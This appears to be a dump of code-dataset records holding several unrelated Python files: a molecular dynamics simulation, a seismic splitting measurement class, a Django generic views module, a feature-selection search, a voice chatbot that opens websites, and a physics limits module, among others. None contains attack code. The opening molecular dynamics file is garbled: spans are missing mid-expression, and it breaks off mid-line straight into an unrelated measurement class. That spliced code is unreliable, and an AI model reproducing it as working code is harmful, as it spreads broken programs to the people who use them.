scenarios with these.\n#macostate:\nN=21 #number of particles\nrho=0.8 #density\nE=-3.00 #total energy per particle\n#time parameters:\nnblk=10\nnstep=10\ndt=0.001\n#**************************************************************\n#probably most of this stuff can be put into initiaization function\n#The user does not need to touch these parameters ordinarily.\n#boundary conditions:\nvol=N/rho\nL=vol**(1/3)\n\n#chemical/physical:\nepsilon=1.0\nsigma=1.0\n#approximations\nrcut=2.5*sigma\nvcut=4.0*epsilon*((sigma/rcut)**12-(sigma/rcut)**6)\n#observables:\nn_obs=4 #Number of properties of the \"walker\"\niv = 0 #Potential energy index\niw = 1 #Virial index\nit = 2 #kinetic energy index \nie = 3 #Total energy index\nn_props=n_obs\n#for g(r)\nigofr = n_props\nnbins = 10\nn_props = n_props + nbins\nbin_size = (L/2.0)/nbins\n#for C_v(t_d)\ni_cv = n_props\nt_delay=100\nn_props = n_props + t_delay\n#for C_pq(t_d)\n#is there any reason why there would be two different delay times\ni_pq=n_props\n#number of wave vectors\nnq=5\n#can ask user to write file containing components of the q's \n#This is our first simple version for defining q along a single axis in q space\nqvec=np.empty(nq)\nfor i in range(nq):\n qvec[i]=i*2*np.pi/L\n\nn_props = n_props + t_delay*nq\nblk_norm=0.0\n\nwalker=np.zeros(n_props)\nblk_av=np.zeros(n_props)\nexp_av=np.zeros(n_props)\nstd2=np.zeros(n_props)\n\n#**************************************************************\n#user interface \n#makes code easier to use, run plotting and statistic from there\n#def interface():\n#**************************************************************\n\n#setup initial conditions\ndef initialize():\n #Global Variabless\n global x,y,z,vx,vy,vz,vx0,vy0,vz0,pq,pq0\n\n #This part computes nced and the number of vacancies in the lattice\n count=0\n while count < N:\n N_test=4*(count**3)\n N_test_1=4*(count+1)**3\n if N == N_test:\n hole_flag=1\n nced=count\n N_hole=0\n break\n elif (N_test0.0, always\n ekin=(E*N)-vtot\n if ekin<0.0:\n print(\"WARNING: Unphysical initial configuration.\")\n \n #use thermodynamics formula =3T/2 to calculate temperature\n T=(2.0/3.0)*(ekin/N)\n\n #boost reference frame to center of mass frame of particle cloud\n vnet=np.zeros(3)\n for i in range(N):\n #uniform random velocities (adjusted later)\n vx[i]=np.random.uniform()-0.5\n vy[i]=np.random.uniform()-0.5\n vz[i]=np.random.uniform()-0.5\n #net velocity components\n vnet[0]=vnet[0]+vx[i]\n vnet[1]=vnet[1]+vy[i]\n vnet[2]=vnet[2]+vz[i]\n \n #components of net velocity per particle\n vnet[0]=vnet[0]/N\n vnet[1]=vnet[1]/N\n vnet[2]=vnet[2]/N\n\n #subtract off net velocity of cloud from velocity of each particle\n for i in range(N):\n vx[i]=vx[i]-vnet[0]\n vy[i]=vy[i]-vnet[1]\n vz[i]=vz[i]-vnet[2]\n\n #calculate velocities using the thermo formula\n sumv2=0.0\n for i in range(N):\n sumv2+= vx[i]*vx[i]+vy[i]*vy[i]+vz[i]*vz[i]\n sumv2 /= N\n \n fs = (3*T/sumv2)**0.5\n #rescale velocities so that they satisfy the thermo formula\n for i in range(N):\n vx[i] *= fs\n vy[i] *= fs\n vz[i] *= fs\n\n print(\"(N,V,E) = \", N,\" \", vol,\" \", E)\n print(\"PBC cell side length: L = \", L)\n print(\"Total potential energy: epot = \", vtot)\n print(\"Total energy: E = \", E)\n print(\"Temperature: T = \", T)\n\n#**************************************************************\n \n#potential energy for a pair of particles function\n#LJV(particles x positions, particles y positions, particles z positions, 1st particle index, 2nd particle index)\ndef LJV(q1, q2, q3, idi, idj):\n dx0=q1[idi]-q1[idj]\n dx0=dx0 - L*int(round(dx0/L))\n dy0=q2[idi]-q2[idj]\n dy0=dy0 - L*int(round(dy0/L))\n dz0=q3[idi]-q3[idj]\n dz0=dz0 - L*int(round(dz0/L))\n dr=dx0**2+dy0**2+dz0**2\n dr=dr**0.5\n v=4.0*epsilon*((sigma/dr)**12-(sigma/dr)**6)\n if dr>=rcut:\n v=0.0\n if dr= self.conf_95()\n elif surftype == 'min':\n confbool = self.errsurf <= self.conf_95()\n else:\n raise ValueError('surftype must be min or max')\n\n # tlag error\n lagbool = confbool.any(axis=1)\n # last true value - first true value\n truth = np.where(lagbool)[0]\n fdlag = (truth[-1] - truth[0] + 1) * lag_step * 0.25\n\n # fast error\n fastbool = confbool.any(axis=0)\n # trickier to handle due to cyclicity of angles\n # search for the longest continuous line of False values\n cyclic = np.hstack((fastbool,fastbool))\n lengthFalse = np.diff(np.where(cyclic)).max() - 1\n # shortest line that contains ALL true values is then:\n lengthTrue = fastbool.size - lengthFalse\n fdfast = lengthTrue * fast_step * 0.25\n\n # return\n return fdfast, fdlag \n \n \n # \"squashed\" profiles\n \n def fastprofile(self):\n surf = (self.lam1-self.lam2)/self.lam2\n surf = surf / surf.sum()\n return np.sum(surf, axis=0)\n \n def lagprofile(self):\n surf = (self.lam1-self.lam2)/self.lam2\n surf = surf / surf.sum()\n return np.sum(surf, axis=1)\n \n\n \n # Output\n \n # def report(self):\n # \"\"\"\n # Report the mesurement in tabular form.\n # \"\"\"\n # toprin\n \n \n # I/O stuff \n\n def save(self,filename):\n \"\"\"\n Save Measurement for future referral\n \"\"\"\n io.save(self,filename)\n \n def copy(self):\n return io.copy(self) \n \n \n # Plotting\n \n def _psurf(self,ax,**kwargs):\n \"\"\"\n Plot an error surface.\n \n **kwargs\n - cmap = 'magma'\n - vals = (M.lam1-M.lam2) / M.lam2\n - ax = None (creates new)\n \"\"\"\n \n if 'cmap' not in kwargs:\n kwargs['cmap'] = 'magma'\n \n if 'vals' not in kwargs:\n kwargs['vals'] = (self.lam1-self.lam2) / self.lam2\n \n # error surface\n cax = ax.contourf(self.lags,self.degs,kwargs['vals'],26,cmap=kwargs['cmap'])\n cbar = plt.colorbar(cax)\n ax.set_ylabel(r'Fast Direction ($^\\circ$)')\n ax.set_xlabel('Delay Time (' + self.units + ')')\n \n # confidence region\n if 'conf95' in kwargs and kwargs['conf95'] == True:\n ax.contour(self.lags,self.degs,self.errsurf,levels=[self.conf_95()])\n \n # marker\n if 'marker' in kwargs and kwargs['marker'] == True:\n ax.errorbar(self.lag,self.fast,xerr=self.dlag,yerr=self.dfast)\n\n ax.set_xlim([self.lags[0,0], self.lags[-1,0]])\n ax.set_ylim([self.degs[0,0], self.degs[0,-1]])\n \n # optional title\n if 'title' in kwargs:\n ax.set_title(kwargs['title']) \n \n # add info in text box\n if 'info' in kwargs and kwargs['info'] == True:\n textstr = '$\\phi=%.1f\\pm%.1f$\\n$\\delta t=%.2f\\pm%.2f$'%\\\n (self.fast,self.dfast,self.lag,self.dlag)\n # place a text box in upper left in axes coords\n props = dict(boxstyle='round', facecolor='white', alpha=0.5)\n ax.text(0.6, 0.95, textstr, transform=ax.transAxes, fontsize=12,\n verticalalignment='top', bbox=props)\n \n return ax\n \n def plot_profiles(self,**kwargs):\n # Error analysis\n fig,ax = plt.subplots(2)\n ax0 = plt.subplot(121)\n ax1 = plt.subplot(122)\n\n ax0.plot(self.degs[0,:],self.fastprofile())\n ax0.axvline(self.fast)\n ax0.axvline(self.fast-2*self.dfast,alpha=0.5)\n ax0.axvline(self.fast+2*self.dfast,alpha=0.5)\n ax0.set_title('fast direction')\n\n ax1.plot(self.lags[:,0],self.lagprofile())\n ax1.axvline(self.lag)\n ax1.axvline(self.lag-2*self.dlag,alpha=0.5)\n ax1.axvline(self.lag+2*self.dlag,alpha=0.5)\n ax1.set_title('lag direction')\n\n plt.show()\n\n\n # Comparison\n \n def __eq__(self, other) :\n # check same class\n if self.__class__ != other.__class__: return False\n # check same keys\n if set(self.__dict__) != set(other.__dict__): return False\n # check same values\n for key in self.__dict__.keys():\n if not np.all( self.__dict__[key] == other.__dict__[key]): return False\n # if reached here then the same\n return True\n \n\n \n","sub_path":"splitwavepy/measure/measure.py","file_name":"measure.py","file_ext":"py","file_size_in_byte":16771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"253441711","text":"# -*- coding: utf-8 -*-\n# Copyright (c) Youngwan Lee (ETRI) All Rights Reserved.\n\nfrom detectron2.config import CfgNode as CN\n\n\ndef add_san_config(cfg):\n \"\"\"\n Add config for VoVNet.\n \"\"\"\n _C = cfg\n\n _C.MODEL.SAN = CN()\n _C.MODEL.SAN.CONV_BODY = \"SAN19_pairwise\"\n _C.MODEL.SAN.BASE_PATH = \"../SAN/exp/imagenet/\"\n _C.MODEL.SAN.OUT_FEATURES = [\"res2\", \"res3\", \"res4\", \"res5\"]\n","sub_path":"san_detectron/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"176208260","text":"\"\"\"Parcel search\n\nRevision ID: 6004db4869c\nRevises: 2e222317d9ce\nCreate Date: 2016-01-21 11:13:44.508580\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '6004db4869c'\ndown_revision = '2e222317d9ce'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\nimport geoalchemy2\n\n\ndef upgrade():\n op.create_table(\n 'search_logs',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('time', sa.DateTime(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table(\n 'search_log_geometries',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('search_log_id', sa.Integer(), nullable=False),\n sa.Column('geometry', geoalchemy2.types.Geometry(\n geometry_type='POLYGON', srid=3857), nullable=True),\n sa.Column('identifier', sa.String(), nullable=True),\n sa.ForeignKeyConstraint(['search_log_id'], ['search_logs.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n\n\ndef downgrade():\n op.drop_table('search_log_geometries')\n op.drop_table('search_logs')\n","sub_path":"app/alembic/versions/6004db4869c_parcel_search.py","file_name":"6004db4869c_parcel_search.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"509262438","text":"import logging\n\nfrom pyFeatSel.FeatureSelectors.FeatureSelector import FeatureSelector\n\n\nclass GreedySearch(FeatureSelector):\n\n def run_selecting(self):\n column_names = self.train_data.columns.values.tolist()\n chosen_column_names = []\n early_stopping = False\n\n while len(column_names) > 0 and not early_stopping:\n result = self._inner_loop(column_names, chosen_column_names)\n if self.best_result is not None:\n if result[\"measure\"][\"test\"] < self.best_result[\"measure\"][\"test\"]:\n if self.maximize_measure:\n early_stopping = True\n else:\n self.best_result = result\n if result[\"measure\"][\"test\"] > self.best_result[\"measure\"][\"test\"]:\n if not self.maximize_measure:\n early_stopping = True\n else:\n self.best_result = result\n else:\n self.best_result = result\n if not early_stopping:\n chosen_column_names += [column_names.pop(result[\"col_id\"])]\n logging.info(\"Best solution! Test Measure: {0}, Val Measure: {1}\".format(self.best_result[\"measure\"][\"test\"],\n self.best_result[\"measure\"][\"val\"]))\n\n def _inner_loop(self, column_names: list, chosen_column_names: list):\n best_result = None\n for i, column_name in enumerate(column_names):\n col_names = [column_name] + chosen_column_names\n measure = self.inner_run(col_names)\n self.computed_features += [{\"measure\": measure, \"column_names\": col_names}]\n logging.debug(\"Test Measure: {0}, Val Measure: {1}\".format(measure[\"test\"], measure[\"val\"]))\n if best_result is None:\n best_result = {\"measure\": measure, \"column_names\": col_names, \"new_column\": column_name, \"col_id\": i}\n elif measure[\"test\"] > best_result[\"measure\"][\"test\"] and self.maximize_measure:\n best_result = {\"measure\": measure, \"column_names\": col_names, \"new_column\": column_name, \"col_id\": i}\n elif measure[\"test\"] < best_result[\"measure\"][\"test\"] and not self.maximize_measure:\n best_result = {\"measure\": measure, \"column_names\": col_names, \"new_column\": column_name, \"col_id\": i}\n else:\n continue\n return best_result\n\n","sub_path":"pyFeatSel/FeatureSelectors/GreedySearch.py","file_name":"GreedySearch.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"529934878","text":"'''\nCreated on 2013-07-04\n\n@author: chris_000\n'''\nimport os\nimport math\nimport pyglet\nfrom pyglet.window import key\nfrom pyglet.sprite import Sprite\n\nclass Car(Sprite):\n def __init__(self, sim):\n self.sim = sim\n '''position'''\n self.posz = 0.0\n '''velocity'''\n self.velx = 0.0\n self.vely = 0.0\n self.velz = 0.0\n \n self.speed = 0\n self.angle = 0\n \n self.dx = 25\n \n self.FRICTION = 0.2\n self.POWER = 1\n self.BRAKEPOWER = 1.5\n self.MAXSPEED = 30\n \n '''sprite'''\n img = pyglet.image.load(os.path.join('res', 'car.png'))\n img.anchor_x = img.width / 2\n img.anchor_y = img.height / 4\n Sprite.__init__(self, img)\n #self.batch = sim.batch\n #self.rotation = 90\n \n def update(self):\n if self.sim.keys[key.UP]:\n if self.speed < self.MAXSPEED:\n self.speed += self.POWER\n elif self.sim.keys[key.DOWN]:\n if self.speed > 0:\n self.speed -= self.BRAKEPOWER\n else:\n self.speed = 0\n if self.sim.keys[key.LEFT]:\n if self.speed > 1:\n self.angle += 3.5\n if self.sim.keys[key.RIGHT]:\n if self.speed > 1:\n self.angle -= 3.5\n \n if self.speed > 0:\n self.speed -= self.FRICTION\n \n self.rotation = (360 - self.angle) + 90\n \n scale_x = math.cos(math.radians(self.angle))\n scale_y = math.sin(math.radians(self.angle))\n self.velx = self.speed * scale_x\n self.vely = self.speed * scale_y\n \n self.x += self.velx\n self.y += self.vely\n self.posz += self.velz\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"carsim/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"187192414","text":"#!/usr/bin/env python3\n# coding: utf-8\nfrom __future__ import print_function\nimport sys\nimport glob\n\nimport zlib\nimport base64\n\nname = 'symarbit'\ntry:\n name = sys.argv[1]\nexcept:\n pass\n\nifname = glob.glob(name + '.cpython-3*-x86_64-linux-gnu.so')[0]\nofname = name + '.txt'\n\nwith open(ifname, 'rb') as fp:\n zdata = zlib.compress(fp.read())\n\nb64text = base64.b64encode(zdata)\nwrap=78\nlength=len(b64text)\nwith open(ofname, 'wb') as fp:\n idx = 0\n while idx < length:\n fp.write(b64text[idx : idx+wrap] + b'\\n')\n idx += wrap\n #fp.write(b64text)\nprint('GENERATE %s' % ofname)\n","sub_path":"ccxtbot/data2text.py","file_name":"data2text.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"426051729","text":"import warnings\nfrom django.template import loader, RequestContext\nfrom django.http import Http404, HttpResponse\nfrom django.core.xheaders import populate_xheaders\nfrom django.core.paginator import Paginator, InvalidPage\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\nwarnings.warn(\n 'Function-based generic views have been deprecated; use class-based views '\n 'instead.', PendingDeprecationWarning\n)\n\n\ndef object_list(request, queryset, paginate_by=None, page=None,\n allow_empty=True, template_name=None, template_loader=loader,\n extra_context=None, context_processors=None,\n template_object_name='object', mimetype=None):\n \"\"\"\n Generic list of objects.\n\n Templates: ``/_list.html``\n Context:\n object_list\n list of objects\n is_paginated\n are the results paginated?\n results_per_page\n number of objects per page (if paginated)\n has_next\n is there a next page?\n has_previous\n is there a prev page?\n page\n the current page\n next\n the next page\n previous\n the previous page\n pages\n number of pages, total\n hits\n number of objects, total\n last_on_page\n the result number of the last of object in the\n object_list (1-indexed)\n first_on_page\n the result number of the first object in the\n object_list (1-indexed)\n page_range:\n A list of the page numbers (1-indexed).\n \"\"\"\n if extra_context is None:\n extra_context = {}\n queryset = queryset._clone()\n if paginate_by:\n paginator = Paginator(queryset, paginate_by,\n allow_empty_first_page=allow_empty)\n if not page:\n page = request.GET.get('page', 1)\n try:\n page_number = int(page)\n except ValueError:\n if page == 'last':\n page_number = paginator.num_pages\n else:\n # Page is not 'last', nor can it be converted to an int.\n raise Http404\n try:\n page_obj = paginator.page(page_number)\n except InvalidPage:\n raise Http404\n c = RequestContext(request, {\n '%s_list' % template_object_name: page_obj.object_list,\n 'paginator': paginator,\n 'page_obj': page_obj,\n 'is_paginated': page_obj.has_other_pages(),\n\n # Legacy template context stuff. New templates should use page_obj\n # to access this instead.\n 'results_per_page': paginator.per_page,\n 'has_next': page_obj.has_next(),\n 'has_previous': page_obj.has_previous(),\n 'page': page_obj.number,\n 'next': page_obj.next_page_number(),\n 'previous': page_obj.previous_page_number(),\n 'first_on_page': page_obj.start_index(),\n 'last_on_page': page_obj.end_index(),\n 'pages': paginator.num_pages,\n 'hits': paginator.count,\n 'page_range': paginator.page_range,\n }, context_processors)\n else:\n c = RequestContext(request, {\n '%s_list' % template_object_name: queryset,\n 'paginator': None,\n 'page_obj': None,\n 'is_paginated': False,\n }, context_processors)\n if not allow_empty and len(queryset) == 0:\n raise Http404\n for key, value in extra_context.items():\n if callable(value):\n c[key] = value()\n else:\n c[key] = value\n if not template_name:\n model = queryset.model\n template_name = \"%s/%s_list.html\" % (\n model._meta.app_label,\n model._meta.object_name.lower()\n )\n t = template_loader.get_template(template_name)\n return HttpResponse(t.render(c), mimetype=mimetype)\n\n\ndef object_detail(request, queryset, object_id=None, slug=None,\n slug_field='slug', template_name=None, template_name_field=None,\n template_loader=loader, extra_context=None,\n context_processors=None, template_object_name='object',\n mimetype=None):\n \"\"\"\n Generic detail of an object.\n\n Templates: ``/_detail.html``\n Context:\n object\n the object\n \"\"\"\n if extra_context is None:\n extra_context = {}\n model = queryset.model\n if object_id:\n queryset = queryset.filter(pk=object_id)\n elif slug and slug_field:\n queryset = queryset.filter(**{slug_field: slug})\n else:\n raise AttributeError(\"Generic detail view must be called with either \"\n \"an object_id or a slug/slug_field.\")\n try:\n obj = queryset.get()\n except ObjectDoesNotExist:\n raise Http404(\n \"No %s found matching the query\" % (model._meta.verbose_name)\n )\n if not template_name:\n template_name = \"%s/%s_detail.html\" % (\n model._meta.app_label, model._meta.object_name.lower()\n )\n if template_name_field:\n template_name_list = [getattr(obj, template_name_field), template_name]\n t = template_loader.select_template(template_name_list)\n else:\n t = template_loader.get_template(template_name)\n c = RequestContext(request, {\n template_object_name: obj,\n }, context_processors)\n for key, value in extra_context.items():\n if callable(value):\n c[key] = value()\n else:\n c[key] = value\n response = HttpResponse(t.render(c), mimetype=mimetype)\n populate_xheaders(request, response, model,\n getattr(obj, obj._meta.pk.name))\n return response\n","sub_path":"cbv/views/list_detail.py","file_name":"list_detail.py","file_ext":"py","file_size_in_byte":5772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"561376903","text":"import json\nfrom goblet.utils import get_g_dir, nested_update\nimport os\nimport logging\n\nlog = logging.getLogger(\"goblet.config\")\nlog.setLevel(logging.INFO)\n\n\nclass GConfig:\n \"\"\"Config class used to get variables from config.json or from the environment. If stage is set as an environment level\n if will parse the corresponding section in config.json and return those config values\"\"\"\n\n def __init__(self, config=None, stage=None):\n self.config = self.get_g_config()\n if config:\n self.config = nested_update(self.config, config)\n self.stage = stage or os.environ.get(\"STAGE\")\n self.validate()\n if self.stage:\n self.config = nested_update(\n self.config, self.config.get(\"stages\", {}).get(self.stage, {})\n )\n\n @staticmethod\n def get_g_config():\n try:\n with open(f\"{get_g_dir()}/config.json\") as f:\n return json.load(f)\n except FileNotFoundError:\n return {}\n except json.decoder.JSONDecodeError:\n log.info(\n \"JSONDecodeError. config.json is not valid. Returning empty config\"\n )\n return {}\n\n def __getattr__(self, name):\n if os.environ.get(name):\n return os.environ.get(name)\n attr = self.config.get(name)\n if attr:\n return attr\n return None\n\n def __setattr__(self, name, value):\n if name not in [\"config\", \"stage\"]:\n self.config[name] = value\n else:\n super(GConfig, self).__setattr__(name, value)\n\n def write(self):\n with open(f\"{get_g_dir()}/config.json\", \"w\") as f:\n f.write(json.dumps(self.config, indent=4))\n\n def validate(self):\n if self.stage and self.stage not in self.config.get(\"stages\"):\n raise ValueError(f\"stage {self.stage} not found in config\")\n for stage in self.config.get(\"stages\", {}):\n if \"function_name\" not in self.config[\"stages\"][stage]:\n raise ValueError(f\"function_name key missing for stage {stage}\")\n","sub_path":"goblet/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"322293600","text":"#!/usr/bin/env python3\n#\n# This file is part of GreatFET\n\nfrom __future__ import print_function\n\nimport errno\nimport sys\n\nimport greatfet\nfrom greatfet import GreatFET\nfrom greatfet.utils import log_silent, log_verbose\n\n\ndef main():\n from greatfet.utils import GreatFETArgumentParser\n\n # Set up a simple argument parser.\n parser = GreatFETArgumentParser(description=\"Utility for experimenting with GreatFET's DAC\")\n parser.add_argument('-S', '--set', nargs=1, type=int, help=\"DAC value to set on ADC0_0 (0-1023)\") \n args = parser.parse_args()\n\n log_function = log_verbose if args.verbose else log_silent\n\n try:\n log_function(\"Trying to find a GreatFET device...\")\n device = GreatFET(serial_number=args.serial)\n log_function(\"{} found. (Serial number: {})\".format(device.board_name(), device.serial_number()))\n except greatfet.errors.DeviceNotFoundError:\n if args.serial:\n print(\"No GreatFET board found matching serial '{}'.\".format(args.serial), file=sys.stderr)\n else:\n print(\"No GreatFET board found!\", file=sys.stderr)\n sys.exit(errno.ENODEV)\n\n if args.set:\n set(device, args.set[0])\n\n\ndef set(device, dac_value):\n device.apis.dac.set(dac_value)\n print(\"DAC value set to\", dac_value)\n\nif __name__ == '__main__':\n main()\n","sub_path":"host/greatfet/commands/greatfet_dac.py","file_name":"greatfet_dac.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"499307715","text":"import nltk\r\nfrom nltk.stem.lancaster import LancasterStemmer\r\nstemmer = LancasterStemmer()\r\n\r\nimport time\r\nimport numpy\r\nimport tflearn\r\nimport tensorflow \r\nimport random\r\nimport json\r\nimport pickle\r\nimport nemo\r\nimport text as t\r\nimport os,datetime\r\nwith open(\"intents.json\") as file:\r\n data = json.load(file)\r\n\r\n\r\n\"\"\"try:\r\n with open(\"data.pickle\",\"rb\") as f:\r\n words,labels,training,output=pickle.load\r\nexcept:\"\"\"\r\nwords = []\r\nlabels = []\r\ndocs_x = []\r\ndocs_y = []\r\n\r\nfor intent in data[\"intents\"]:\r\n for pattern in intent[\"patterns\"]:\r\n wrds = nltk.word_tokenize(pattern)\r\n words.extend(wrds)\r\n docs_x.append(wrds)\r\n docs_y.append(intent[\"tag\"])\r\n if intent[\"tag\"] not in labels:\r\n labels.append(intent[\"tag\"])\r\n\r\nwords = [stemmer.stem(w.lower()) for w in words if w != \"?\"]\r\nwords = sorted(list(set(words)))\r\n\r\nlabels = sorted(labels)\r\n\r\ntraining = []\r\noutput = []\r\n\r\nout_empty = [0 for _ in range(len(labels))]\r\n\r\nfor x, doc in enumerate(docs_x):\r\n bag = []\r\n\r\n wrds = [stemmer.stem(w.lower()) for w in doc]\r\n\r\n for w in words:\r\n if w in wrds:\r\n bag.append(1)\r\n else:\r\n bag.append(0)\r\n\r\n output_row = out_empty[:]\r\n output_row[labels.index(docs_y[x])] = 1\r\n\r\n training.append(bag)\r\n output.append(output_row)\r\n\r\n\r\ntraining = numpy.array(training)\r\noutput = numpy.array(output)\r\n\"\"\"with open(\"data.pickle\",\"wb\") as f:\r\n pickle.dump((words,labels,training,output),f)\"\"\"\r\ntensorflow.reset_default_graph()\r\n\r\nnet = tflearn.input_data(shape=[None, len(training[0])])\r\nnet = tflearn.fully_connected(net, 8)\r\nnet = tflearn.fully_connected(net, 8)\r\nnet = tflearn.fully_connected(net, len(output[0]), activation=\"softmax\")\r\nnet = tflearn.regression(net)\r\n\r\nmodel = tflearn.DNN(net)\r\n\r\n#try:\r\n# model.load(\"model.tflearn\")\r\n#except:\r\nmodel.fit(training, output, n_epoch=1000, batch_size=8, show_metric=True)\r\nmodel.save(\"model.tflearn\")\r\n\r\ndef bag_of_word(s,words):\r\n bag=[0 for _ in range(len(words))]\r\n\r\n s_words=nltk.word_tokenize(s)\r\n s_words=[stemmer.stem(word.lower()) for word in s_words]\r\n \r\n for se in s_words:\r\n for i ,w in enumerate(words):\r\n if w==se:\r\n bag[i]=1\r\n return numpy.array(bag)\r\n\r\ndef AImain(requiment):\r\n \r\n try:\r\n #requiment=nemo.ask()\r\n if \"open Facebook\" in requiment:\r\n t.open_facebook()\r\n elif \"open Gmail\" in requiment:\r\n t.open_gmail()\r\n elif \"open GitHub\" in requiment:\r\n t.open_github()\r\n elif \"open Wiki\" in requiment:\r\n t.open_wiki()\r\n elif \"song\" in requiment and \"YouTube\" in requiment:\r\n song=requiment.split()\r\n song=song[1:requiment.index(\"song\")]\r\n song=\"\".join(song)\r\n t.open_video_on_youtube(song)\r\n elif \"open YouTube\" in requiment:\r\n t.open_youtube()\r\n \r\n elif 'open code' in requiment:\r\n os.startfile(r'C:\\Program Files (x86)\\Sublime Text 3\\sublime_text.exe')\r\n elif 'search' in requiment:\r\n link=b.replace(\"open\",\"\")\r\n t.open_google(link)\r\n elif \"weather in\" in requiment:\r\n data=' '.join(requiment.split()[2:])\r\n weather=nemo.get_weather(data)\r\n print(weather)\r\n nemo.tts(weather)\r\n elif 'film' in requiment:\r\n data=' '.join(requiment.split()[1:requiment.index('flim')])\r\n t.opem_flim(data)\r\n elif 'time' in requiment:\r\n time=str(datetime.datetime.now().hour)+\" and \"+str(datetime.datetime.now().minute)+' minute'\r\n nemo.tts_orther(time,'vi')\r\n except:\r\n pass\r\n \r\ndef chat():\r\n print(\"Start talking with Nemo!...\")\r\n time.sleep(3)\r\n while True:\r\n try:\r\n you_talk=nemo.ask()\r\n print(f\"you:{you_talk}\")\r\n stop=[\"quit\",\"exit\"]\r\n if you_talk.lower() in stop:\r\n break\r\n results=model.predict([bag_of_word(you_talk,words)])\r\n max_index=numpy.argmax(results)\r\n tag=labels[max_index]\r\n for t in data['intents']:\r\n if tag==t[\"tag\"]:\r\n rep=random.choice(t[\"responses\"])\r\n print(f\"bot:{rep}\")\r\n nemo.tts(rep)\r\n AImain(you_talk)\r\n\r\n except:\r\n print(\"say that again,sir\")\r\n nemo.tts(\"say that again,sir\")\r\n\r\n\r\nchat()\r\n","sub_path":"new_nemo.py","file_name":"new_nemo.py","file_ext":"py","file_size_in_byte":4483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"249294955","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport logging\nimport numpy as np\nimport os\nfrom scipy.stats import chi2, poisson\n\nfrom madminer.analysis import DataAnalyzer\nfrom madminer.utils.various import mdot\nfrom madminer.ml import ParameterizedRatioEstimator, Ensemble\nfrom madminer.utils.histo import Histo\nfrom madminer.sampling import SampleAugmenter\nfrom madminer import sampling\nfrom madminer.ml import ScoreEstimator\n\nlogger = logging.getLogger(__name__)\n\n\nclass AsymptoticLimits(DataAnalyzer):\n \"\"\"\n Functions to calculate observed and expected constraints, using asymptotic properties of the likelihood ratio as\n test statistics.\n\n Parameters\n ----------\n filename : str\n Path to MadMiner file (for instance the output of `madminer.delphes.DelphesProcessor.save()`).\n\n include_nuisance_parameters : bool, optional\n If True, nuisance parameters are taken into account. Default value: False.\n \"\"\"\n\n def __init__(self, filename=None, include_nuisance_parameters=False):\n super(AsymptoticLimits, self).__init__(filename, False, include_nuisance_parameters)\n\n def observed_limits(\n self,\n x_observed,\n theta_ranges,\n mode=\"ml\",\n model_file=None,\n hist_vars=None,\n hist_bins=20,\n include_xsec=True,\n resolutions=25,\n luminosity=300000.0,\n ):\n theta_grid, p_values, i_ml = self._analyse(\n len(x_observed),\n x_observed,\n theta_ranges,\n resolutions,\n mode,\n model_file,\n hist_vars,\n hist_bins,\n include_xsec,\n None,\n luminosity,\n )\n return theta_grid, p_values, i_ml\n\n def expected_limits(\n self,\n theta_true,\n theta_ranges,\n mode=\"ml\",\n model_file=None,\n hist_vars=None,\n hist_bins=20,\n include_xsec=True,\n resolutions=25,\n luminosity=300000.0,\n ):\n x_asimov, x_weights = self._asimov_data(theta_true)\n n_observed = luminosity * self._calculate_xsecs([theta_true])[0]\n theta_grid, p_values, i_ml = self._analyse(\n n_observed,\n x_asimov,\n theta_ranges,\n resolutions,\n mode,\n model_file,\n hist_vars,\n hist_bins,\n include_xsec,\n x_weights,\n luminosity,\n )\n return theta_grid, p_values, i_ml\n\n def asymptotic_p_value(self, log_likelihood_ratio):\n q = -2.0 * log_likelihood_ratio\n p_value = chi2.sf(x=q, df=self.n_parameters)\n return p_value\n\n def _analyse(\n self,\n n_events,\n x,\n theta_ranges,\n theta_resolutions,\n mode=\"ml\",\n model_file=None,\n hist_vars=None,\n hist_bins=20,\n include_xsec=True,\n obs_weights=None,\n luminosity=300000.0,\n ):\n logger.debug(\"Calculating p-values for %s expected events\", n_events)\n\n # Observation weights\n if obs_weights is None:\n obs_weights = np.ones(len(x))\n obs_weights /= np.sum(obs_weights)\n obs_weights = obs_weights.astype(np.float64)\n\n # Theta grid\n theta_grid = self._make_theta_grid(theta_ranges, theta_resolutions)\n\n # Kinematic part\n if mode == \"rate\":\n log_r_kin = 0.0\n elif mode == \"ml\":\n assert model_file is not None\n logger.info(\"Loading kinematic likelihood ratio estimator\")\n model = self._load_ratio_model(model_file)\n\n logger.info(\"Calculating kinematic log likelihood ratio with estimator\")\n log_r_kin = self._calculate_log_likelihood_ratio_kinematics(x, theta_grid, model)\n log_r_kin = 